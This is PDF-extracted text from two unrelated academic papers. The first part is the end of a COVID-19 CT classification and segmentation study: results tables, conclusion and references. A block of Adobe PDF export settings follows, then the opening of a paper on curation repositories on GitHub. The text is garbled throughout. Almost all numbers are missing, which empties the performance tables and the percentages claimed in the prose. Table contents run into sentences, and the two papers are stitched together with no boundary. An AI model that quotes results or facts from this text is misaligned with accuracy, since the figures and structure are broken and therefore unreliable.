the mean intersection over union (iou) attained by the all-class stream, each of the three specialized streams, and their average. considering the performance of the specialized streams, which outperformed the single stream approach, we believe that this defines an accuracy-complexity trade-off, that is, in order to attain better dsc and iou, the system needs to include multiple specialized streams. we also believe that given the covid- pandemic management as an application, in which significant resources have already been invested, there is a higher priority for developing highly accurate systems over low-complexity systems. to compare the performance of the proposed approach with other models, we report the results for specific types of infection manifestations as well as the overall performance for all types of manifestations. table shows a manifestation-specific comparison between the performance of our model, namely, deeplab-v + model with transfer learning from pulmonary nodule detection, and other models from the recent literature table different performance metrics for the adopted multi-label classifier. we show the perfor- mance for individual labels as well as the overall performance. class name accuracy (%) precision (%) senstivity (%) f -score (%) pleural effusion . ground glass . consolidation . overall . . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ including previous research that adopted deeplab-v +. the comparison highlights the superiority of our approach consistently for the two types of manifestations. this represents approximately % and % increase in dcs of ground-glass opacities and consolidation, respectively, compared to the recent literature. for miou, the figure the output segmentation masks of the adopted deep models. the images in column from (a) to (c) show the chest ct images of three scans. column from (d) to (f) shows the ground-truth masks for these three scans, where the white represents the consolidation, dark gray represents pleural effusion and light gray corresponds to ground-glass opacities. column from (g) to (i) depicts the segmentation results generated by our model for all classes where the red represents the consolidation, the green represents the pleural effusion, and the yellow represents the ground-glass opacities. the images in columns , , and from (j) to (r) represent the output from the specialized stream that are trained to segment ground-glass opacities, pleural effusion, and the consolidation, respectively. full-size doi: . /peerj-cs. /fig- table a comparison between the performance of each of the specialized streams as well as the all-class stream, with regards to dice coefficient (dsc) and mean intersection over union (miou). for all the streams, a deeplab-v + model, with an xception as a feature extractor, is used. all-class stream : pe stream : ggo stream : consolidation multi-stream average dsc (%) . . . . . miou (%) . . . . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comparison yields an increase of approximately % and % in dcs of ground-glass opacities and consolidation, respectively. we further make a comparison that is not manifestation-specific, between the performance of the proposed approach and the recent literature. in table , we demonstrate an increase of approximately . % and . % for mean intersection-over- union (miou) and dice coefficient, respectively, compared to the recent literature. figure depicts a subjective comparison using examples for the output segmentation table a quantitative comparison on the covid- segmentation dataset between our segmentation method and other methods in the recent literature. the comparison considers dsc and miou. it also considers the overall performance on the three different types of infection manifes- tations, that is, it is not a manifestation-specific comparison. method dsc (%) miou (%) u-net + dl (zhou, canu & ruan, ) . . u-net + ftl (zhou, canu & ruan, ) . . u-net × (amyar, modzelewski & ruan, ) . . au-net + dl (zhou, canu & ruan, ) . . u-net × (amyar, modzelewski & ruan, ) . . au-net + ftl (zhou, canu & ruan, ) . . backbone + ppd + ra + ea (fan et al., ) . . jcs (wu et al., ) . . jcs‘ (wu et al., ) . . amine (amyar, modzelewski & ruan, ) . . u-net (chen, yao & zhang, ) . m–a (chen, yao & zhang, ) . m–r (chen, yao & zhang, ) . ours method . . table a quantitative comparison of manifestation-specific dsc and miou, for ground-glass opacity and consolidation, between our segmented method and other methods in the recent literature. method dsc miou ground-glass opacities deeplabv + (stride = ) (fan et al., ) . . deeplabv + (stride = ) (fan et al., ) . . fcn s (fan et al., ) . . semi-inf-net+fcn s (fan et al., ) . . ours (deeplab-v + + exception- ) . . consolidation deeplabv + (stride = ) (fan et al., ) . . deeplabv + (stride = ) (fan et al., ) . . fcn s (fan et al., ) . . semi-inf-net+fcn s (fan et al., ) . . ours (deeplab-v + + exception- ) . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ masks on the covid- validation set obtained using u-net (chen, yao & zhang, ) and deeplab-v + (ours). we also demonstrate less computational cost than the traditional test, the rt-pcr, and other diagnostic tools (huang et al., ; wu et al., ). we report this comparison in table , which shows a % reduction in diagnosis/computational time per case. table summarizes the model hyper-parameters used in the three tasks that are accomplished by the proposed system. figure segmentation output visualization results. (a) and (b) chest ct images of two scans. (c) and (d) ground-truth masks for these two scans, where the white represents the consolidation, dark gray represents pleural effusion and light gray corresponds to ground-glass opa- cities. (e) and (f) the outputs of the u-net. (g) and (h) the segmentation results generated by our model. full-size doi: . /peerj-cs. /fig- table a summary of hyper-parameters used in the proposed model. task_no steps/epochs learning rate optimizer momentum dropout weight decay batch size task , steps . gradient descent – – – task epochs . adam – . – task k steps . sgd . – . table a comparison between the proposed method and other diagnostic tools in the literature concerning the average diagnosis time per case. method (won et al., ) (huang et al., ) (wu et al., ) ours test time h . min s . s el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusion in this research, we proposed a multi-task pipeline for the recognition of covid- , and the classification and segmentation of related infection manifestations in medical scans. we are inspired by the emerging role that medical imaging-based diagnostics can play as a digital second opinion to manage the current pandemic. the proposed pipeline starts with a covid- recognition stage. towards this goal, we fine-tuned and inception-v model which was pre-trained on imagenet. we evaluated the performance of this model on two tasks, namely, the two-class problem of covid- /non-covid- recognition, and the four-class problem of recognizing covid- scans from other scans that correspond to normal, viral pneumonia, and bacterial pneumonia cases. we outperformed other techniques in the recent literature, consistently in both types of classification problems. to the best of our knowledge, we are also the first to highlight a potential advantage for multi-modal learning, that is, learning from x-rays and ct scans over learning from x-rays only. in the second stage, we addressed a problem that was not been addressed by the recent literature, namely, the identification of the probabilities of presence for different types of infection manifestations in medical scans. this stage was implemented using a multi-label cnn classifier, and we envisage its potential to serve in early detection of infection manifestations. it also complements the third stage which addresses the problem of computing binary masks for segmenting the regions corresponding to infection regions in ct scans. for effective segmentation, we adapted the knowledge from another domain, namely, pulmonary nodule segmentation. this approach resulted in an increase of approximately . % and . % for dice coefficient and mean intersection-over-union (miou), respectively, while requiring % less computational time, compared to the recent literature. all the stages of the proposed pipeline were trained and tested using widely adopted datasets, and evaluated using various objective measures. we also used data augmentation techniques to avoid over-fitting that might have occurred due to the relatively limited volume of available data. for further enhancement of the performance of the segmentation stage, we showed that using multiple streams can significantly improve the quality of the output masks, as measured by the dsc and miou, such that each stream is trained to segment a specific type of infection manifestations. additional information and declarations funding the authors received no funding for this work. competing interests shimaa el-bana and maha sharkas declare that they have no competing interests. ahmad al-kabbany is the founder of vrapeutic, and is currently serving as a member of the research & development department's team. el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions � shimaa el-bana conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � ahmad al-kabbany conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � maha sharkas conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: dataset and scripts are available at github: https://github.com/shimaaelbana/classification-and-segmentation-of-infection- manifestations-in-covid- -scans. the datasets acquired for analysis are available at: . covid- ct segmentation dataset: http://medicalsegmentation.com/covid /? fbclid=iwar uzz f mbhhvf hmhs oq lmoxq ydmxboc lkkzyl h envf u_fup. . the covid- image data collection repository on github: https://github.com/ ieee /covid-chestxray-dataset. . the rsna pneumonia detection challenge dataset: https://www.kaggle.com/c/rsna- pneumonia-detection-challenge. references ai t, yang z, hou h, zhan c, chen c, lv w, tao q, sun z, xia l. . correlation of chest ct and rt-pcr testing in coronavirus disease (covid- ) in china: a report of cases. radiology ( ): doi . /radiol. . amyar a, modzelewski r, ruan s. . multi-task deep learning based ct imaging analysis for covid- : classification and segmentation. medrxiv doi . / . . . . chan jf-w, yuan s, kok k-h, to kk-w, chu h, yang j, xing f, liu j, yip cc-y, poon rw-s, tsoi h-w, lo sk-f, chan k-h, poon vk-m, chan w-m, ip jd, cai j-p, cheng vc-c, chen h, hui ck-m, yuen k-y. . a familial cluster of pneumonia associated with the novel coronavirus indicating person-to-person transmission: a study of a family cluster. lancet ( ): – doi . /s - ( ) - . chen d, jiang x, hong y, wen z, wei s, peng g, wei x. . can chest ct features distinguish patients with negative from those with positive initial rt-pcr results for coronavirus disease (covid- )? american journal of roentgenology : – doi . /ajr. . . chen g, li c, wei w, jing w, woźniak m, blažauskas t, damaševičius r. . fully convolutional neural network with augmented atrous spatial pyramid pool and fully connected fusion path for high resolution remote sensing image segmentation. applied sciences ( ): . chen l-c, papandreou g, schroff f, adam h. . rethinking atrous convolution for semantic image segmentation. available at https://arxiv.org/abs/ . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/shimaaelbana/classification-and-segmentation-of-infection-manifestations-in-covid- -scans https://github.com/shimaaelbana/classification-and-segmentation-of-infection-manifestations-in-covid- -scans http://medicalsegmentation.com/covid /?fbclid&#x d;iwar uzz f mbhhvf hmhs oq lmoxq ydmxboc lkkzyl h envfu_fup http://medicalsegmentation.com/covid /?fbclid&#x d;iwar uzz f mbhhvf hmhs oq lmoxq ydmxboc lkkzyl h envfu_fup http://medicalsegmentation.com/covid /?fbclid&#x d;iwar uzz f mbhhvf hmhs oq lmoxq ydmxboc lkkzyl h envfu_fup https://github.com/ieee /covid-chestxray-dataset https://github.com/ieee /covid-chestxray-dataset https://www.kaggle.com/c/rsna-pneumonia-detection-challenge https://www.kaggle.com/c/rsna-pneumonia-detection-challenge http://dx.doi.org/ . /radiol. http://dx.doi.org/ . / . . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ajr. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chen l-c, zhu y, papandreou g, schroff f, adam h. . encoder-decoder with atrous separable convolution for semantic image segmentation. in: proceedings of the european conference on computer vision (eccv), new york: springer international publishing, – . chen x, yao l, zhang y. . residual attention u-net for automated multi-class segmentation of covid- chest ct images. available at https://arxiv.org/abs/ . . chollet f. . xception: deep learning with depthwise separable convolutions. in: proceedings of the ieee conference on computer vision and pattern recognition, piscataway: ieee, – . chu dkw, pan y, cheng sms, hui kpy, krishnan p, liu y, ng dym, wan ckc, yang p, wang q, peiris m, poon llm. . molecular diagnosis of a novel coronavirus ( -ncov) causing an outbreak of pneumonia. clinical chemistry ( ): – doi . /clinchem/hvaa . Çiçek Ö, abdulkadir a, lienkamp ss, brox t, ronneberger o. . d u-net: learning dense volumetric segmentation from sparse annotation. in: international conference on medical image computing and computer-assisted intervention, berlin: springer, – . cohen jp, morrison p, dao l. . covid- image data collection. available at https://arxiv.org/ abs/ . . coronaviridae study group of the international committee on taxonomy of viruses. . the species severe acute respiratory syndrome-related coronavirus: classifying -ncov and naming it sars-cov- . nature microbiology : . el-bana s, al-kabbany a, sharkas m. . a two-stage framework for automated malignant pulmonary nodule detection in ct scans. diagnostics ( ): doi . /diagnostics . elharrouss o, subramanian n, al-maadeed s. . an encoder-decoder-based method for covid- lung infection segmentation. available at https://arxiv.org/abs/ . . fan d-p, zhou t, ji g-p, zhou y, chen g, fu h, shen j, shao l. . inf-net: automatic covid- lung infection segmentation from ct scans. medrxiv doi . / . . . . fang y, zhang h, xie j, lin m, ying l, pang p, ji w. . sensitivity of chest ct for covid- : comparison to rt-pcr. radiology ( ): doi . /radiol. . he j-l, luo l, luo z-d, lyu j-x, ng m-y, shen x-p, wen z. . diagnostic performance between ct and initial real-time rt-pcr for clinically suspected coronavirus disease (covid- ) patients outside wuhan, china. respiratory medicine : . hope md, raptis ca, shah a, hammer mm, henry ts. . a role for ct in covid- ? what data really tell us so far. lancet ( ): – doi . /s - ( ) - . huang z, zhao s, li z, chen w, zhao l, deng l, song b. . the battle against coronavirus disease (covid- ): emergency management and infection control in a radiology department. journal of the american college of radiology ( ): – doi . /j.jacr. . . . kingma dp, ba j. . adam: a method for stochastic optimization. available at https://arxiv.org/ pdf/ . . koonsanit k, thongvigitmanee s, pongnapang n, thajchayapong p. . image enhancement on digital x-ray images using n-clahe. in: th biomedical engineering international conference (bmeicon), piscataway: ieee, – . lai c-c, shih t-p, ko w-c, tang h-j, hsueh p-r. . severe acute respiratory syndrome coronavirus (sars-cov- ) and corona virus disease- (covid- ): the epidemic and the challenges. international journal of antimicrobial agents : . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . /clinchem/hvaa https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /diagnostics https://arxiv.org/abs/ . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jacr. . . https://arxiv.org/pdf/ . https://arxiv.org/pdf/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ li k, fang y, li w, pan c, qin p, zhong y, liu x, huang m, liao y, li s. a. ct image visual quantitative evaluation and clinical classification of coronavirus disease (covid- ). european radiology ( ): – doi . /s - - - . li q, guan x, wu p, wang x, zhou l, tong y, ren r, leung ksm, lau ehy, wong jy, xing x, xiang n, wu y, li c, chen q, li d, liu t, zhao j, liu m, tu w, chen c, jin l, yang r, wang q, zhou s, wang r, liu h, luo y, liu y, shao g, li h, tao z, yang y, deng z, liu b, ma z, zhang y, shi g, lam tty, wu jt, gao gf, cowling bj, yang b, leung gm, feng z. b. early transmission dynamics in wuhan, china, of novel coronavirus—infected pneumonia. new england journal of medicine ( ): – doi . /nejmoa . liu x, faes l, kale au, wagner sk, fu dj, bruynseels a, mahendiran t, moraes g, shamdas m, kern c, ledsam jr, schmid mk, balaskas k, topol ej, bachmann lm, keane pa, denniston ak. . a comparison of deep learning performance against health-care professionals in detecting diseases from medical imaging: a systematic review and meta-analysis. lancet digital health ( ):e –e doi . /s - ( ) - . loey m, smarandache fm, khalifa ne. . within the lack of chest covid- x-ray dataset: a novel detection model based on gan and deep transfer learning. symmetry ( ): doi . /sym . mahdianpari m, salehi b, rezaee m, mohammadimanesh f, zhang y. . very deep convolutional neural networks for complex land cover mapping using multispectral remote sensing imagery. remote sensing ( ): doi . /rs . narin a, kaya c, pamuk z. . automatic detection of coronavirus disease (covid- ) using x-ray images and deep convolutional neural networks. available at https://arxiv.org/abs/ . . nasrullah n, sang j, alam ms, mateen m, cai b, hu h. . automated lung nodule detection and classification using deep learning combined with multiple strategies. sensors ( ): doi . /s . ozkaya u, ozturk s, barstugan m. . coronavirus (covid- ) classification using deep features fusion and ranking technique. available at https://arxiv.org/abs/ . . patel bn, rosenberg l, willcox g, baltaxe d, lyons m, irvin j, rajpurkar p, rajpurkar t, gupta r, halabi s, langlotz c, lo e, mammarappallil j, mariano aj, riley g, seekins j, shen l, zucker e, lungren mp. . human-machine partnership with artificial intelligence for chest radiograph diagnosis. npj digital medicine ( ): – doi . /s - - - . perez f, vasconcelos c, avila s, valle e. . data augmentation for skin lesion analysis. in: or . context-aware operating theaters, computer assisted robotic endoscopy, clinical image-based procedures, and skin image analysis. berlin: springer, – . polat h, danaei mehr h. . classification of pulmonary ct images by using hybrid d-deep convolutional neural network architecture. applied sciences ( ): doi . /app . ronneberger o, fischer p, brox t. . u-net: convolutional networks for biomedical image segmentation. in: international conference on medical image computing and computer-assisted intervention. berlin: springer, – . sethy pk, behera sk. . detection of coronavirus disease (covid- ) based on deep features. international journal of mathematical, engineering and management sciences ( ): – doi . /ijmems. . . . . sharfstein jm, becker sj, mello mm. . diagnostic testing for the novel coronavirus. jama ( ): doi . /jama. . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /sym http://dx.doi.org/ . /rs https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /s https://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /app http://dx.doi.org/ . /ijmems. . . . http://dx.doi.org/ . /jama. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shen j, zhang cj, jiang b, chen j, song j, liu z, he z, wong sy, fang p-h, ming w-k. . artificial intelligence versus clinicians in disease diagnosis: systematic review. jmir medical informatics ( ):e doi . / . simonyan k, zisserman a. . two-stream convolutional networks for action recognition in videos. in: advances in neural information processing systems. – . song y, zheng s, li l, zhang x, zhang x, huang z, chen j, zhao h, jie y, wang r, chong y, shen j, zha y, yang y. . deep learning enables accurate diagnosis of novel coronavirus (covid- ) with ct images. medrxiv doi . / . . . . szegedy c, vanhoucke v, ioffe s, shlens j, wojna z. . rethinking the inception architecture for computer vision. in: proceedings of the ieee conference on computer vision and pattern recognition. – . tahamtan a, ardebili a. . real-time rt-pcr in covid- detection: issues affecting the results. expert review of molecular diagnostics ( ): – doi . / . . . wang d, hu b, hu c, zhu f, liu x, zhang j, wang b, xiang h, cheng z, xiong y, zhao y, li y, wang x, peng z. . clinical characteristics of hospitalized patients with novel coronavirus-infected pneumonia in wuhan, china. jama ( ): – doi . /jama. . . wang l, wong a. . covid-net: a tailored deep convolutional neural network design for detection of covid- cases from chest radiography images. available at https://arxiv.org/abs/ . . won j, lee s, park m, kim ty, park mg, choi by, kim d, chang h, kim vn, lee cj. . development of a laboratory-safe and low-cost detection protocol for sars-cov- of the coronavirus disease (covid- ). molecular cell ( ): – doi . /j.molcel. . . . wu jt, leung k, leung gm. . nowcasting and forecasting the potential domestic and international spread of the -ncov outbreak originating in wuhan, china: a modelling study. lancet ( ): – doi . /s - ( ) - . wu y-h, gao s-h, mei j, xu j, fan d-p, zhao c-w, cheng m-m. . jcs: an explainable covid- diagnosis system by joint classification and segmentation. available at https://arxiv.org/abs/ . . xia x, xu c, nan b. . inception-v for flower classification. in: nd international conference on image, vision and computing (icivc). piscataway: ieee, – . ye z, zhang y, wang y, huang z, song b. . chest ct manifestations of new coronavirus disease (covid- ): a pictorial review. european radiology ( ): – doi . /s - - - . zhang b, wang l, wang z, qiao y, wang h. . real-time action recognition with enhanced motion vector cnns. in: proceedings of the ieee conference on computer vision and pattern recognition. – . zhao j, zhang y, he x, xie p. . covid-ct-dataset: a ct scan dataset about covid- . available at https://arxiv.org/abs/ . . zheng c, deng x, fu q, zhou q, feng j, ma h, liu w, wang x. . deep learning-based detection for covid- from chest ct using weak label. medrxiv doi . /tmi. . . zhou t, canu s, ruan s. . an automatic covid- ct segmentation based on u-net with attention mechanism. available at https://arxiv.org/abs/ . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . / . . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /jama. . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.molcel. . . http://dx.doi.org/ . /s - ( ) - https://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - https://arxiv.org/abs/ . http://dx.doi.org/ . /tmi. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ zhou z, siddiquee mmr, tajbakhsh n, liang j. . unet++: redesigning skip connections to exploit multiscale features in image segmentation. ieee transactions on medical imaging : – doi . /tmi. . . zu zy, jiang md, xu pp, chen w, ni qq, lu gm, zhang lj. . coronavirus disease (covid- ): a perspective from china. radiology ( ): doi . /radiol. . zuiderveld k. . graphics gems iv: contrast limited adaptive histogram equalization. cambridge: academic press professional, inc., – . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tmi. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in covid- scans ... introduction results and discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted april accepted september published october corresponding author yu wu, yuw @psu.edu academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright wu et al. distributed under creative commons cc-by . open access the appropriation of github for curation yu wu , na wang , jessica kropczynski and john m. carroll information sciences and technology, pennsylvania state university, university park, pa, united states of america samsung research america, mountain view, ca, united states of america school of information technology, university of cincinnati, cincinnati, oh, united states of america abstract github is a widely used online collaborative software development environment. in this paper, we describe curation projects as a new category of github project that collects, evaluates, and preserves resources for software developers. we investigate: ( ) what motivates software developers to curate resources; ( ) why curation has occurred on github; ( ) how curated resources are used by software developers; and ( ) how the github platform could better support these practices. we conduct in- depth interviews with software developers, each of whom hosts curation projects on github. our results suggest that the motivators that inspire software developers to curate resources on github are similar to those that motivate them to participate in the development of open source projects. convenient tools (e.g., markdown syntax and git version control system) and the opportunity to address professional needs of a large number of peers attract developers to engage in curation projects on github. benefits of curating on github include learning opportunities, support for development work, and professional interaction. however, curation is limited by github’s document structure, format, and a lack of key features, such as search. in light of this, we propose design possibilities to encourage and improve appropriations of github for curation. subjects human-computer interaction, software engineering keywords curation, github, appropriation introduction github is a collaborative coding environment that employs social media features. it encourages software developers to perform collaborative software development by offering distributed version control and source code management services with social features (i.e., user profiles, comments, and broadcasting activity traces) (dabbish et al., ). this web-based tool has attracted notable attention from both industry and academic communities. by the end of , software developers hosted over . million repositories on github (marlow, dabbish & herbsleb, ). it has not only topped the list of preferred software hosting and collaboration services among developers (doll, ), but also inspired a number of researchers to investigate how its features have supported software development practices (dabbish et al., ; marlow, dabbish & herbsleb, ; singer et al., ). these prior studies have concluded that software developers make social inferences and collaborate with each other using github social features (i.e., activity traces how to cite this article wu et al. ( ), the appropriation of github for curation. peerj comput. sci. :e ; doi . /peerj- cs. https://peerj.com mailto:yuw @psu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. and follow function) (dabbish et al., ; marlow, dabbish & herbsleb, ; singer et al., ; wu et al., ). in addition to hosting and collaborating through the use of github repositories, a new category of practice has recently emerged—software developers have begun appropriating github repositories to create public resources lists (wu et al., ). such practices are recognized as curation—activities to select, evaluate, and organize resources for preservation and future use (duh et al., ). in and , github repositories, such as awesome-python (https://github.com/vinta/awesome-python) and awesome-go (https://github.com/avelino/awesome-go), which curate resources about programming topics, gained vast popularity on github. the number of curation repositories has steadily increased since then and many of them have remained among the most famous repositories on the entire platform (wu et al., ). in light of the broad popularity of curation practices on github, one might expect that motivations to participate in them and reasons that they are hosted as github repositories rather than external websites are well-understood. however, research exploring the ways that social coding repository features have been appropriated for resource curation is sparse. in fact, the investigation of curation practices on social media has only recently begun and remains under-explored in general (duh et al., ). the existing curation literature focuses on microblogging services (i.e., twitter) (duh et al., ; dabbish et al., ; greene et al., ) and media sharing service (i.e., pinterest), leaving the nature of curation in software development practices untouched as an area of exploration. to address this gap in the literature, we conducted semi-structured interviews with github curators to better understand motivations to engage in this practice. in doing so, our study aims to investigate: ( ) developers’ motivations that drive curation practices; ( ) why github is chosen for this purpose; ( ) how curated resources are used; and ( ) current limitations and potential future improvements for curation on github. our results suggest that curation practices on github mostly grow out of software developers’ internal (altruism) and extrinsic motivations (personal needs and peer recognition). software developers choose github to perform curation practices mainly because this platform provides convenient tools and attracts vast groups of people with common interests. software developers also benefit from curation in many aspects such as better software development support, efficient learning tools, and communication with the community. further, curation represents a case that a collaborative working space is appropriated to an end-product for communicating high quality resources, suggesting github repositories can be used for communication purposes to support the larger community of software developers. however, current curation practices are restricted by document format, curation process, and are bounded by github features. the addition of built-in tools, such as navigation support within curation projects and automated resources for updates and evaluation, hold potential for improving current practices. our study contributes to a better understanding of software developers’ motivation to curate resources and the nature of appropriating github features for curation. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/vinta/awesome-python https://github.com/avelino/awesome-go http://dx.doi.org/ . /peerj-cs. background this section reviews previous literature that explores individuals’ motivation to curate, tools for curation, and current curation practice on github. motivations to curate in the social media era curation is a common practice in archeology. it is the activity of collecting, evaluating, organizing, and preserving a set of resources for future use (bamforth, ). in the internet era, technology assists curation is 